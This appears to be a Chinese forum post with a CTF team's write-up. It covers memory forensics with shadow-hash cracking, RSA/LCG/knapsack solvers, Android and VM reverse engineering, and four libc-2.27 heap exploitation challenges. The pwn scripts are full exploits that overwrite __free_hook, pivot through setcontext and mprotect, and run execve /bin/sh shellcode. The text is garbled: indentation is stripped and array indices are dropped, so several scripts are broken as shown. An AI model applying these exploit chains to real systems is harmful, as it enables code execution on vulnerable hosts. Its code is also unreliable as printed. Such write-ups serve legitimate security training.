|
本帖最后由 adopi 于 2023-8-28 00:47 编辑
Arr3stY0u 战队 WRITEUP
一、 战队信息
战队名称:Arr3stY0u
战队排名:2
二、 解题情况
三、 解题过程
misc
strange_forensics
先无脑 strings 一个个试过去 可以得到 flag3,Ux_forEnsIcs_MASTER
直接 vol 跑不出来,识别不到 profile
strings 1.mem | grep "Linux version"先查看一下 linux 版本是 Ubuntu18.04.1,内核是 5.4.0-
84-g
参考[(17 条消息) 制作 Linux 内存镜像+制作对应的 volatility profile_shu 天的博客-CSDN 博
客 _ 内存镜像 ](https://blog.csdn.net/weixin_46081055/article/details/121897319) 做一下
profile,扔进 volatility/volatility/plugins/overlays/linux,成功识别到内存对应的 profile
ps:这里 linux 的 volatility 出了点问题,换成 windows 下了
提取一下 shadow,用 hashcat 直接跑,得到第一段 flag
bob1$C5/bIl1n$9l5plqPKK4DjjqpGHz46Y/:19283:0:99999:7:::
890topico
find_file 不知道为什么报错了,用 lsof 看到 secret.zip
提取出来发现压缩包数据错误,crc 爆破无果想到之前比赛的思路改一下加密位,爆破一下,
得到 flag2,_y0u_Ar3_tHe_Lin
最终 flag,flag{890topico_y0u_Ar3_tHe_LInUx_forEnsIcS_MASTER}
crypto
babyDLP
原题 找了个脚本直接跑的
from pwn import *
from sage import *
from Crypto.Util.number import *
context.proxy = 'localhost'
class Gao:
def __init__(self):
# self.conn = process(['python3', 'another.py'])
self.conn = remote('101.201.71.136', 38476)
self.p = 2 ** 1024 - 2 ** 234 - 2 ** 267 - 2 ** 291 - 2 ** 403 - 1
self.s_high = 1
self.Zp = Zmod(self.p)
def gao_check(self):
self.conn.sendline('T')
ans = self.Zp(4).nth_root(self.s_high)
print('Guessing: {}'.format(ans))
self.conn.sendline(str(ans))
self.conn.recvuntil('integer: \n')
a = self.conn.recvline()
if ('Great!' in a):
print(a)
print(ZZ(ans).nbits())
return True
else:
return False
def gao_one(self):
self.conn.sendline('T')
ans = self.Zp(2).nth_root(self.s_high)
self.conn.sendline(str(ans))
self.conn.recvuntil('integer: \n')
a = self.conn.recvline()
if ('Great!' in a):
print(a)
print(ZZ(ans).nbits())
return True
else:
a = a[8:]
t, r = eval(a)
self.s_high <<= 1
if (t == 0):
self.s_high |= 1
self.t = 1 - t
print('{:b}'.format(self.s_high))
return False
def gao(self):
while (True):
if (self.gao_one()):
break
if (self.t == 1):
if (self.gao_check()):
break
def gao_2(self):
for i in range(1023):
if (self.gao_one()):
break
else:
for i in range(20):
self.gao_check()
self.s_high >>= 1
if __name__ == '__main__':
g = Gao()
g.gao_2()
common_rsa
直接分解 n 解 rsa
n =
2537849084284811715206447958256281198235061766726834565445396756138957493
5706794446579649289936308746565274995106902124872987149871645012275967526
6109104893465718371075137027806815473672093804600537277140261127375373193
0531731637112343096190169408188931905498117788226411655860709527788252266
69497115448984409
e =
3140677571589956016278786997470001694759584043870824754952079477501360981
8293759112173738791912355029131497095419469938722402909767606953171285102
663874040755958087885460234337741136082351825063419747360169129165
c =
9772407384319956312629913855710006220811930961417535410456679599987885585
1589393774478499956448658027850289531621583268783154684298592331328032682
3168683911202855150769118927370518421163941654236702754222438942204221961
9333655138298669975975623296257333629103257296806058613631790159541479622
9127047082707519
p=2100714968473145706833211326609777591663024907923029373568408546014570
0796880956996855348862572729597251282134827276249945199994121834609654781
077209340587
q=n//p
import gmpy2
from Crypto.Util.number import *
d=gmpy2.invert(e,(p-1)*(q-1))
m=pow(c,d,n)
from Crypto.Util.number import *
print(long_to_bytes(m))
tracing
直接逆着跑一边还原
from Crypto.Util.number import *
c=6488587531755609055823899406625680505221386416151443528574889156177986
7972960805879348109302233463726130814478875296026610171472811894585459078
4603331314913923473463674222767011283807395988731562791736396911268144117
5265727983880478055018686363751044572020610396299408750740729681466227060
5713097055799853102
n=1137935134908948811755682524066660811089167912079475451984286417927681
1058108335931848235548572447640720467917157837674197295850628487247009649
8674038813765700336353715590069074081309886710425934960057225969468061891
3269463984921948125942198905531850433909155092009302036550224204440278419
86189782168065174301
e=65537
f=open('trace.out','rb').read()
b=0
a=1
def isOdd(a):
return a & 1 == 1
def rshift1(a):
return a << 1
def lshift(a, s):
return a >> s
for i in range(len(f)):
if (b'a, b = b, a' in f):
a, b = b, a
if (b'a = rshift1(a)' in f):
a=rshift1(a)
if (b'b = rshift1(b)' in f):
b=rshift1(b)
if (b'a = a - b' in f):
a = a + b
d=inverse(65537,a)
m=pow(c,d,n)
print(long_to_bytes(m))
fill
先解 lcg,再解一个背包
from hashlib import sha256
import gmpy2
S=492226042629702
s=[562734112,859151551,741682801]
M = [19621141192340, 39617541681643, 3004946591889, 6231471734951,
3703341368174, 48859912097514, 4386411556216, 11028070476391, 18637548953150,
29985057892414, 20689980879644, 20060557946852, 46908191806199, 8849137870273,
28637782510640, 35930273563752, 20695924342882, 36660291028583,
10923264012354, 29810154308143, 4444597606142, 31802472725414, 23368528779283,
15179021971456, 34642073901253, 44824809996134, 31243873675161,
27159321498211, 2220647072602, 20255746235462, 24667528459211, 46916059974372]
n = 991125622
m=(s[2]-s[1])*gmpy2.invert((s[1]-s[0]),n)%n
c=(s[1]-m*s[0])%n
for i in range(3, 32):
s.append((s[i-1]*m+c)%n)
for t in range(32):
M[t] = M[t] - s[t]
A = Matrix(ZZ, 32, 32)
for i in range(n):
A[i, i] = 1
for i in range(n):
A[i, n] = M
A[n, n] = -c
res = A.LLL()
#print(res)
little little fermat
n 直接分解,使用费马小定律求 x
from Crypto.Util.number import *
import gmpy2
n =
1413210673257164263754835069152249300972468659604741550690401763568607074
3554027091108158975147178351963999658958949587721449719649897845300515427
2785048418715013714419926299248566038773669282170912502161620702945933984
6808802877578628378804741840040826198807937335171912974699802463156239245
71332042031367393
c =
8136876283135898034875730394017899471881865667977445030053321501611795941
2236853310026456227434535301960147956843664862777300751319650636299943068
6200070670639454533109928284980835562053520256386006431378495630809967978
8850302715352731552465800325176718742738279645197411836254650778885434908
6917112114926883
e=65537
q=1188785377289426564283464992957815718084824093908416422233447605748748
5972806971092902627112665734648016476153593841839977704512156756634066593
725142934001
p=n//q
x=q-1
x=(x**2)
assert (pow(114514,x,q)==1)
d=inverse(e,(p-1)*(q-1))
m=pow(c,d,n)
flag=m^x
print(long_to_bytes(flag))
pwn
bitheap
from pwncli import *
cli_script()
set_remote_libc('libc-2.27.so')
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
def cmd(i, prompt="Your choice: "):
sla(prompt, i)
def add(i, sz):
cmd('1')
sla("Index: ", str(i))
sla("Size: ", str(sz))
def edit(i, data):
cmd('2')
sla("Index: ", str(i))
sa("Content: ", data)
def show(i):
cmd('3')
sla("Index: ", str(i))
def dele(i):
cmd('4')
sla("Index: ", str(i))
def int2bin_str(x):
return bin(x)[2:].zfill(64)[::-1]
for i in range(10):
add(i, 0xf0)
add(10, 0x200)
add(11, 0x200)
dele(11)
dele(10)
add(10, 0x200)
show(10)
ru("Content: ")
m = rl()
heapaddr = u64_ex(m[:-1])
leak("heapaddr", heapaddr)
for i in range(7):
dele(i+3)
dele(1)
add(1, 0x78)
show(1)
lbaddr = recv_current_libc_addr()
lb = set_current_libc_base_and_log(lbaddr, 0x3ebd90)
add(3, 0x78)
edit(3, 0x70 * 8 * "a" + int2bin_str(0x200) + "0")
dele(0)
dele(2)
dele(1)
add(0, 0x110)
edit(0, b"a" * 0x100 * 8 + int2bin_str(libc.sym.__free_hook).encode())
add(1, 0x78)
add(2, 0x78)
add(11, 0x200)
layout = {
0: heapaddr+0x100,
0xa0: heapaddr,
0xa8: libc.sym.mprotect,
0x68: heapaddr & ~0xfff,
0x70: 0x4000,
0x88: 7,
0x100: asm(
shellcraft.amd64.linux.mmap_rwx(address=0x400000) +
shellcraft.amd64.memcpy(0x400800, heapaddr+0x180, 0x20)
) + asm("""
xor esp, esp
mov rsp, 0x400100
mov eax, 0x23
mov [rsp+4], eax
mov eax, 0x400800
mov [rsp], eax
retf
"""),
0x180: ShellcodeMall.i386.execve_bin_sh
}
pl = flat(layout, filler="\x90")
last = ""
for x in range(0, len(pl), 8):
last += int2bin_str(u64_ex(pl[x:x+8]))
edit(11, last)
edit(2, int2bin_str(libc.sym.setcontext+53).encode())
dele(11)
sleep(0.2)
sl("cat flag")
ia()
leak
from pwncli import *
cli_script()
set_remote_libc('libc-2.27.so')
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
@stopwatch(2)
def cmd(i, prompt="Your choice: "):
sla(prompt, i)
def add(i, sz):
cmd('1')
sla("Index: ", str(i))
sla("Size: ", str(sz))
def edit(i, data):
cmd('2')
sla("Index: ", str(i))
sa("Content: ", data)
def dele(i):
cmd('3')
sla("Index: ", str(i))
@smart_enumerate_attack(loop_time=16)
def exp():
add(0, 0x80)
add(1, 0x20)
for i in range(8):
edit(0, flat(0, 0))
dele(0)
add(2, 0x20)
if gift.debug:
off = gift._libc_base + 0x3ed940 # global_max_fast
else:
off = 0x6940
off &= 0xffff
edit(2, p16(off))
add(3, 0x80)
add(4, 0x80)
dele(2)
edit(2, flat(0, 0))
dele(2)
edit(2, "\x40")
add(5, 0x20)
add(6, 0x20)
edit(6, flat(0, 0x1181))
dele(2)
edit(2, flat(0, 0))
dele(2)
edit(2, "\x50")
add(7, 0x20)
add(8, 0x20) # **** to free
edit(8, flat(0, 0x41))
add(9, 0x2000)
edit(9, flat({0x1060:[0, 0x21, 0, 0]*3}))
dele(9)
add(10, 0x200)
edit(4, flat(0x1200)) # global_max_fast
dele(8)
edit(6, "a"*0x20)
edit(9, b"a"*0x208+p32(0x11))
add(11, 0x2000)
m = ra(timeout=3)
if b"flag" in m or b"FLAG" in m or b"{" in m:
print(m)
raise PwncliExit()
else:
raise OSError()
ia()
exp()
queue
import functools
from pwncli import *
cli_script()
set_remote_libc('libc-2.27.so')
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
def show_name(func):
@functools.wraps(func)
def war(*args, **kwargs):
log_ex("call func: {}, args: {} {}".format(func.__name__, args, kwargs))
res = func(*args, **kwargs)
return res
return war
def cmd(i, prompt="Queue Management: "):
sla(prompt, i)
def add(sz):
cmd('1')
sla("Size: ", str(sz))
def edit(i1, i2, num):
cmd('2')
sla("Index: ", str(i1))
sla("Value idx: ", str(i2))
sla("Value: ", str(num))
def show(i, num):
cmd('3')
sla("Index: ", str(i))
sla("Num: ", str(num))
ru("Content: ")
def dele():
cmd('4')
def gift_(i, data):
cmd('666')
sla("Index: ", str(i))
sa("Content: ", data)
add(0x100)
gift_(0, flat(0, 0, "\x88"))
show(0, 0x8)
msg = rs(8)
heapaddr = u64_ex(bytes.fromhex(b"".join(msg).decode()))
leak("heapaddr", heapaddr)
# gift_(0, flat(0, 0, heapaddr+0x1000, heapaddr+0x1000))
# edit(0, 0, 0xff)
for i in range(7):
add(0x100)
for i in range(6):
dele()
gift_(0, flat(0, 0, heapaddr+0x1a50))
show(0, 0x8)
msg = rs(8)
libcaddr = u64_ex(bytes.fromhex(b"".join(msg).decode()))
leak("libcaddr", libcaddr)
set_current_libc_base_and_log(libcaddr, 0x3ebca0)
gift_(0, flat(0, 0, libc.sym.__free_hook, libc.sym.__free_hook))
for i,x in enumerate(p64_ex(libc.sym.system)):
edit(0, i, x)
gift_(0, flat(0, 0, heapaddr+0x17f0, heapaddr+0x17f0))
for i,x in enumerate(b"/bin/sh\x00"):
edit(0, i, x)
dele()
sleep(0.1)
sl("cat flag")
ia()
sandboxheap
from pwncli import *
cli_script()
set_remote_libc('libc-2.27.so')
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
def cmd(i, prompt="Your choice: "):
sla(prompt, i)
def add(i, sz):
cmd('1')
sla("Index: ", str(i))
sla("Size: ", str(sz))
def edit(i, data):
cmd('2')
sla("Index: ", str(i))
sa("Content: ", data)
def show(i):
cmd('3')
sla("Index: ", str(i))
def dele(i):
cmd('4')
sla("Index: ", str(i))
def int2bin_str(x):
return bin(x)[2:].zfill(64)[::-1]
for i in range(10):
add(i, 0xf0)
add(10, 0x200)
add(11, 0x200)
dele(11)
dele(10)
add(10, 0x200)
show(10)
ru("Content: ")
m = rl()
heapaddr = u64_ex(m[:-1])
leak("heapaddr", heapaddr)
for i in range(7):
dele(i+3)
dele(1)
add(1, 0x78)
show(1)
lbaddr = recv_current_libc_addr()
lb = set_current_libc_base_and_log(lbaddr, 0x3ebd90)
add(3, 0x78)
edit(3, 0x70 * 8 * "a" + int2bin_str(0x200) + "0")
dele(0)
dele(2)
dele(1)
add(0, 0x110)
edit(0, b"a" * 0x100 * 8 + int2bin_str(libc.sym.__free_hook).encode())
add(1, 0x78)
add(2, 0x78)
add(11, 0x200)
layout = {
0: heapaddr+0x100,
0xa0: heapaddr,
0xa8: libc.sym.mprotect,
0x68: heapaddr & ~0xfff,
0x70: 0x4000,
0x88: 7,
0x100: asm(
shellcraft.amd64.linux.mmap_rwx(address=0x400000) +
shellcraft.amd64.memcpy(0x400800, heapaddr+0x180, 0x20)
) + asm("""
xor esp, esp
mov rsp, 0x400100
mov eax, 0x23
mov [rsp+4], eax
mov eax, 0x400800
mov [rsp], eax
retf
"""),
0x180: ShellcodeMall.i386.execve_bin_sh
}
pl = flat(layout, filler="\x90")
last = ""
for x in range(0, len(pl), 8):
last += int2bin_str(u64_ex(pl[x:x+8]))
edit(11, last)
edit(2, int2bin_str(libc.sym.setcontext+53).encode())
dele(11)
sleep(0.2)
sl("cat flag")
ia()
reverse
GetTheCorrectKey
解密文本
s = [(118788, 53, 4),
(118800, 245, 20),
(118821, 214, 15),
(118837, 40, 5),
(118848, 79, 24),
(118880, 225, 25),
(118906, 180, 4),
(118912, 22, 21),
(118944, 17, 26),
(118976, 156, 21),
(119008, 113, 30),
(119039, 116, 14),
(119056, 240, 27),
(119088, 166, 16),
(119120, 52, 19),
(119140, 28, 3),
(119144, 227, 15),
(119160, 146, 1),
(119162, 130, 9),
(119184, 207, 17),
(119216, 143, 37),
(119254, 244, 14),
(119280, 194, 20),
(119312, 61, 22),
(119335, 10, 5),
(119344, 56, 22),
(119376, 147, 28),
(119408, 227, 19),
(119440, 25, 25),
(119496, 60, 9),
(119520, 139, 36),
(119568, 79, 32),
(119601, 213, 6),
(119616, 230, 61),
(119678, 198, 10),
(119696, 201, 39),
(119736, 93, 9),
(119746, 236, 3),
(119750, 242, 4),
(119760, 101, 41),
(119808, 107, 19),
(119828, 98, 4),
(119833, 71, 7),
(119856, 3, 19),
(119876, 123, 8),
(119888, 47, 24),
(119913, 184, 3),
(119920, 63, 25),
(119946, 140, 8),
(119968, 58, 20),
(120000, 110, 37),
(120038, 40, 15),
(120054, 208, 14),
(120080, 186, 25),
(120112, 131, 29),
(120142, 123, 8),
(120160, 153, 27),
(120192, 165, 25),
(120218, 198, 11),
(120240, 69, 36),
(120288, 185, 36),
(120325, 131, 6),
(120336, 39, 47),
(120384, 224, 19),
(120404, 227, 3),
(120416, 239, 21),
(120438, 202, 7),
(120448, 106, 21),
(120470, 253, 3),
(120480, 9, 0x18)]
for ea, key, size in s:
b = bytearray(ida_bytes.get_bytes(ea, size+1))
for i in range(len(b)):
b ^= key
print(hex(ea), b)
ida_bytes.patch_bytes(ea, bytes(b))
解密 SMC
s = [(0x9994+31, 0x12, 287-31)]
for ea, key, size in s:
b = bytearray(ida_bytes.get_bytes(ea, size+1))
for i in range(len(b)):
b ^= key
ida_bytes.patch_bytes(ea, bytes(b))
逆向 xxxxx 函数
char *__fastcall xxxxx(JNIEnv *a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v1 = SMC();
*(_BYTE *)(2 * (_DWORD)v1) = (_BYTE)v1;
Class = FindClass(a1, (int)aAndroidAppActi);
v55 = sub_A060(a1, Class, asc_1D230, aLandroidAppAct_0);
FieldID = GetFieldID(a1, (int)Class, (int)aMinitialapplic, (int)aLandroidAppApp_0);
v53 = sub_A0F0((int)a1, (int)Class, v55);
ObjectField = GetObjectField(a1, v53, (int)FieldID);
v51 = FindClass(a1, (int)aAndroidAppAppl);
getAssets = GetMethodID(a1, (int)v51, aGetassets, aLandroidConten_0);
v49 = CallObjectMethodV(a1, ObjectField, getAssets);
v48 = FindClass(a1, (int)aAndroidContent);
openFd = GetMethodID(a1, (int)v48, aOpenfd, aLjavaLangStrin_0);
v46 = NewStringUTF(a1, (int)aWhoamiBin);
v45 = CallObjectMethodV(a1, v49, openFd, v46);
v44 = FindClass(a1, (int)aAndroidContent_0);
getLength = GetMethodID(a1, (int)v44, aGetlength, aJ);
size = CallLongMethodV(a1, (int)v45, (int)getLength);
open = GetMethodID(a1, (int)v48, aOpen, aLjavaLangStrin_1);
v40 = CallObjectMethodV(a1, v49, open, v46);
v39 = NewByteArray(a1, size);
v38 = FindClass(a1, (int)aJavaIoInputstr);
read = GetMethodID(a1, (int)v38, aRead, aBiiI);
v36 = CallIntMethodV(a1, (int)v40, (int)read, v39, 0, size);
ptr = malloc(size);
if ( v36 >= 1 )
GetByteArrayRegion(a1, (int)v39, 0, size, (int)ptr);
for ( i = 0; i <= 31; ++i )
ptr ^= 0x56u;
for ( j = 32; j < size; ++j )
ptr[j] ^= 0x78u;
SetByteArrayRegion(a1, (int)v39, 0, size, (int)ptr);
if ( ptr )
free(ptr);
v32 = FindClass(a1, (int)aJavaNioBytebuf);
StaticMethodID = GetStaticMethodID(a1, (int)v32, (int)aAllocate, (int)aILjavaNioByteb);
v30 = (void *)sub_8FA0(a1, v32, StaticMethodID);
MethodID = GetMethodID(a1, (int)v32, aPut, aBLjavaNioByteb);
v28 = GetMethodID(a1, (int)v32, aPosition, aILjavaNioBuffe);
CallObjectMethodV(a1, v30, MethodID, v39);
CallObjectMethodV(a1, v30, v28, 0);
v27 = FindClass(a1, (int)aComCtfGettheco);
v26 = FindClass(a1, (int)aJavaLangClass);
v25 = GetMethodID(a1, (int)v26, aGetclassloader, aLjavaLangClass);
v24 = CallObjectMethodV(a1, v27, v25);
v23 = FindClass(a1, (int)aDalvikSystemPa);
v22 = GetFieldID(a1, (int)v23, (int)aPathlist, (int)aLdalvikSystemD);
v21 = FindClass(a1, (int)aDalvikSystemDe);
v20 = GetFieldID(a1, (int)v21, (int)aDexelements, (int)aLdalvikSystemD_0);
v19 = FindClass(a1, (int)aDalvikSystemIn);
v18 = GetMethodID(a1, (int)v19, aInit, aLjavaNioBytebu);
v17 = NewObjectV(a1, (int)v19, (int)v18, v30, v24);
v16 = GetObjectField(a1, (int)v17, (int)v22);
v15 = GetObjectField(a1, (int)v16, (int)v20);
v14 = GetObjectField(a1, (int)v24, (int)v22);
v13 = GetObjectField(a1, (int)v14, (int)v20);
v12 = FindClass(a1, (int)aJavaUtilArrayl);
v11 = GetMethodID(a1, (int)v12, aAdd, aLjavaLangObjec);
v10 = GetMethodID(a1, (int)v12, aToarray, aLjavaLangObjec_0);
v9 = GetMethodID(a1, (int)v12, aInit, aV);
v8 = NewObjectV(a1, (int)v12, (int)v9);
for ( k = 0; k < GetArrayLength(a1, (int)v15); ++k )
{
ObjectArrayElement = GetObjectArrayElement(a1, (int)v15, k);
CallBooleanMethodV(a1, (int)v8, (int)v11, ObjectArrayElement);
}
for ( m = 0; m < GetArrayLength(a1, (int)v13); ++m )
{
v4 = GetObjectArrayElement(a1, (int)v13, m);
CallBooleanMethodV(a1, (int)v8, (int)v11, v4);
}
v3 = CallObjectMethodV(a1, v8, v10);
SetObjectField(a1, (int)v14, (int)v20, (int)v3);
return SMC();
}
其实主要逻辑就是读取 whoami.bin 解密并作为 dex 加载
解密 dex
a = bytearray(open('./whoami.bin', 'rb').read())
for i in range(0, 32):
a ^= 0x56
for i in range(32, len(a)):
a ^= 0x78
open('./whoami_dec.dex', 'wb').write(a)
dex 部分反编译代码
public class GodBlessYou {
private static int w = 32;
private static int r = 20;
private static int Pw = -1209970333;
private static int Qw = -1640531527;
private static int[] S = new int[(20 * 2) + 4];
public static final char[] ALPHABET =
"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz".toCharArray()
;
private static final int[] INDEXES = new int[128];
// 太长不放了
public static boolean check(String content) {
if (content != null && content.length() == 16) {
try {
byte[] cipherText = encryptBlock(content.getBytes(),
"tryyourbest!@#$%".getBytes());
String result = base58(cipherText);
if (result.equals("QRWfeKdmtG5dzRuR3ZRxv5")) {
return true;
}
return false;
} catch (Exception e) {
return false;
}
}
return false;
}
}
通过常量可以判断是 RC6 和 base58
在线网站解得 flag,flag{efds_&^#%@}
matrix
反编译脚本
import struct
pc = 0
code =
bytes.fromhex('001D1808831808002020001D18088319202483281D001D1880332820001
D18803319B023331808000F20001D18803319B823331808001420001D18803319C02333
180400241AFFFFFFFF3B20001D18803319C82333180400281AFFFFFFFF3B20001D1880331
9C82333180408280518072841001D18803319C823331804082842001D18803319C02333
1804082843001D18803319C82333180408001D18803319C0233318040840041A0700000
0E01AC7070000B018072841002019C02333180408284218302843002019C023331804081
83040041A07000000E01A9B070000B00020199C233318041800201A49050000B00020199
8233318041800201AC1040000B000201994233318041800201A927E40002844002019902
33318041800201A9F030000B00020198C233318041800201A17030000B00020199C23331
8040828140020199023331804080020199C2333180408322805180728410020199023331
804080020199C2333180408322842002019C023331804082843002019902333180408002
0199C233318040832002019C0233318040840021A07000000E01A77020000B0002019982
33318040828140020198C2333180408002019982333180408322805180728410020198C2
333180408002019982333180408322842002019C0233318040828430020198C233318040
800201998233318040832002019C0233318040840021A07000000E01A09020000B000201
9B023331808080020198C2333180408002019C0233318040800201990233318040800201
99C2333180408325A000020199823331804083232C2011802733318040828140020198C2
333180408002019C823331804080020199023331804085A0032C201180273280F002019B
023331808080020198C2333180408002019C023331804080020199023331804080020199
C2333180408325A000020199823331804083232C20118027333180408002019B82333180
8080020198C2333180408002019C823331804080020199023331804085A0032C20118027
3331804085A0028051A4D7F40002844002019942333180408D201002019B023331808080
020198C2333180408002019C023331804080020199023331804080020199C23331804083
25A000020199823331804083232C20118027333180408002019B823331808080020198C2
333180408002019C823331804080020199023331804085A0032C201180273331804085A0
0D2020020199423331804002019942333180408002019B023331808080020198C2333180
408002019C023331804080020199023331804080020199C2333180408325A00002019982
3331804083232C20118027333180408002019B823331808080020198C233318040800201
9C823331804080020199023331804085A0032C201180273331804085A00322018032841
DA2B2842DA9428431A01000000B00020198C2333180408D2030020198C2333180400201
98C23331804081801322018032841DA022842180128431A01000000B00020198C233318
04082805180728410020198C23331804082842002019C8233318040828430020198C2333
180408002019C8233318040840021AACFCFFFFE01A01000000B0002019902333180408D2
0300201990233318040020199023331804081801322018032841DA022842180128431A01
000000B00020199023331804082805180728410020199023331804082842002019C82333
1804082843002019902333180408002019C8233318040840021A24FCFFFFE01A01000000
B0002019982333180408C201280F0020199C2333180408C2011801730020199C23331804
08C20133180473002019982333180408C201332814002019942333180408280500200020
199C2333180408C2011801730020199C2333180408C20133180473002019982333180408
C20133180273331880831804002019942333180408201AB27F4000284400201998233318
0408D20400201998233318040020199823331804081801322018032841DA142842180128
431A01000000B00020199823331804082805180728410020199823331804082842002019
C023331804082843002019982333180408002019C0233318040840021A02FBFFFFE01A01
000000B00020199C2333180408D2030020199C233318040020199C233318040818013220
18032841DA022842180128431A01000000B00020199C2333180408280518072841002019
9C23331804082842002019C0233318040828430020199C2333180408002019C023331804
0840021A7AFAFFFFE01A01000000B000201988233318041800201AA7010000B000201984
233318041800201A1F010000B0002019842333180408002019C023331804080020198823
331804085A0032C201180273002019B0233318080833280F002019842333180408C20128
24002019882333180408C20128140020002019882333180408C201180173002019882333
180408C20133180473002019842333180408C20133180273331880831804082805002019
842333180408002019C023331804080020198823331804085A0032C201180273002019B0
23331808083318040020002019882333180408C201180173002019882333180408C20133
180473002019842333180408C2013318027333188083180408201A508040002844002019
842333180408D20500201984233318040020198423331804081801322018032841DA2228
42180128431A01000000B000201984233318040828051807284100201984233318040828
42002019C023331804082843002019842333180408002019C0233318040840021AA4FEFF
FFE01A01000000B0002019882333180408D2030020198823331804002019882333180408
1801322018032841DA022842180128431A01000000B00020198823331804082805180728
410020198823331804082842002019C023331804082843002019882333180408002019C0
233318040840021A1CFEFFFFE01A01000000B018042841001D28421920242843001D1920
243318080828201A868040002844001D19202433180833180833281DA0')
def fetch():
global pc
v = code[pc]
pc += 1
return v
def fetch2():
global pc
v = struct.unpack_from('<H', code, pc)[0]
pc += 2
return v
def fetch4():
global pc
v = struct.unpack_from('<I', code, pc)[0]
pc += 4
return v
def fetch8():
global pc
v = struct.unpack_from('<Q', code, pc)[0]
pc += 8
return v
cmp_types = [
'==', '!=', '<', '>=', '<=', '>', '<s', '>=s', '<=s', '>s'
]
# x86_regs = [
# 'rax', 'rbx', 'rcx', 'rdx', 'rsi', 'rdi', 'rsp', 'rbp',
# 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15',
# 'rip', 'r17', 'r18', 'r19'
# ]
x86_regs = {
5: 'rax',
15: 'rcx',
20: 'rdx',
29: 'rsp',
32: 'rbp',
36: 'r8',
40: 'r9',
65: 'r17',
66: 'r18',
67: 'r19',
68: 'rip',
}
def vm_parse():
global pc
pc = 0
vm_stack = []
vm_regs = [0]*8
labels = set()
while pc < len(code):
if pc in labels:
print()
print(f'L{pc:04X}: ', end='')
opcode = fetch()
match opcode:
case 224:
target = (pc-1+vm_stack.pop())&0xFFFFFFFF
labels.add(target)
print(f'if (xf) goto_fixme L{target:04X};')
case 176:
target = (pc-1+vm_stack.pop())&0xFFFFFFFF
labels.add(target)
print(f'goto_fixme L{target:04X};')
case 8:
print(f'load();', end='')
case 32:
print(f'memcpy();', end='')
case 0:
off = fetch()
reg = x86_regs[off]
print(f'read_x86reg({reg});', end='')
case 40:
off = fetch()
reg = x86_regs[off]
print(f'write_x86reg({reg});', end='')
case 216:
idx = fetch()
print(f'push_reg1(tmp_{idx});', end='')
case 217:
idx = fetch()
print(f'push_reg2(tmp_{idx});', end='')
case 218:
idx = fetch()
print(f'push_reg4(tmp_{idx});', end='')
case 219:
idx = fetch()
print(f'push_reg8(tmp_{idx});', end='')
case 208:
idx = fetch()
print(f'tmp_{idx} = pop_reg1();', end='')
case 209:
idx = fetch()
print(f'tmp_{idx} = pop_reg2();', end='')
case 210:
idx = fetch()
print(f'tmp_{idx} = pop_reg4();', end='')
case 211:
idx = fetch()
print(f'tmp_{idx} = pop_reg8();', end='')
case 24:
imm = fetch()
print(f'push_imm1({hex(imm)});', end='')
vm_stack.append(imm)
case 25:
imm = fetch2()
print(f'push_imm2({hex(imm)});', end='')
vm_stack.append(imm)
case 26:
imm = fetch4()
print(f'push_imm4({hex(imm)});', end='')
vm_stack.append(imm)
case 27:
imm = fetch8()
print(f'push_imm8({hex(imm)});', end='')
vm_stack.append(imm)
# case 28:
# imm = fetch16()
# print(f'push_imm16({hex(imm)});', end='')
case 48:
print(f'add1();', end='')
case 49:
print(f'add2();', end='')
case 50:
print(f'add4();', end='')
case 51:
print(f'add8();', end='')
case 56:
print(f'and1();', end='')
case 57:
print(f'and2();', end='')
case 58:
print(f'and4();', end='')
case 59:
print(f'and8();', end='')
case 60:
print(f'and16();', end='')
case 64:
cmp_type = fetch()
print(f'xf = cmp1({cmp_types[cmp_type]});', end='')
case 65:
cmp_type = fetch()
print(f'xf = cmp2({cmp_types[cmp_type]});', end='')
case 66:
cmp_type = fetch()
print(f'xf = cmp4({cmp_types[cmp_type]});', end='')
case 67:
cmp_type = fetch()
print(f'xf = cmp8({cmp_types[cmp_type]});', end='')
case 68:
cmp_type = fetch()
print(f'xf = cmp16({cmp_types[cmp_type]});', end='')
case 72:
sig = fetch()
print(f'div1();', end='')
case 73:
sig = fetch()
print(f'div2();', end='')
case 74:
sig = fetch()
print(f'div4();', end='')
case 75:
sig = fetch()
print(f'div8();', end='')
case 76:
sig = fetch()
print(f'div16();', end='')
case 80:
sig = fetch()
print(f'mod1();', end='')
case 81:
sig = fetch()
print(f'mod2();', end='')
case 82:
sig = fetch()
print(f'mod4();', end='')
case 83:
sig = fetch()
print(f'mod8();', end='')
case 84:
sig = fetch()
print(f'mod16();', end='')
case 88:
sig = fetch()
print(f'mul1();', end='')
case 89:
sig = fetch()
print(f'mul2();', end='')
case 90:
sig = fetch()
print(f'mul4();', end='')
case 91:
sig = fetch()
print(f'mul8();', end='')
case 92:
sig = fetch()
print(f'mul16();', end='')
case 96:
print(f'or1();', end='')
case 97:
print(f'or2();', end='')
case 98:
print(f'or4();', end='')
case 99:
print(f'or8();', end='')
case 100:
print(f'or16();', end='')
case 104:
print(f'sar1();', end='')
case 105:
print(f'sar2();', end='')
case 106:
print(f'sar4();', end='')
case 107:
print(f'sar8();', end='')
case 108:
print(f'sar16();', end='')
case 120:
print(f'shr1();', end='')
case 121:
print(f'shr2();', end='')
case 122:
print(f'shr4();', end='')
case 123:
print(f'shr8();', end='')
case 124:
print(f'shr16();', end='')
case 112:
print(f'shl1();', end='')
case 113:
print(f'shl2();', end='')
case 114:
print(f'shl4();', end='')
case 115:
print(f'shl8();', end='')
case 116:
print(f'shl16();', end='')
case 128:
print(f'sub1();', end='')
case 129:
print(f'sub2();', end='')
case 130:
print(f'sub4();', end='')
case 131:
print(f'sub8();', end='')
case 132:
print(f'sub16();', end='')
case 136:
print(f'xor1();', end='')
case 137:
print(f'xor2();', end='')
case 138:
print(f'xor4();', end='')
case 139:
print(f'xor8();', end='')
case 140:
print(f'xor16();', end='')
case 152:
print(f'not1();', end='')
case 153:
print(f'not2();', end='')
case 154:
print(f'not4();', end='')
case 155:
print(f'not8();', end='')
case 156:
print(f'not16();', end='')
case 194:
n = fetch()
if n == 1:
print(f'nop();', end='')
else:
print(f'mov_{n}();', end='')
case 160:
print(f'exit();', end='')
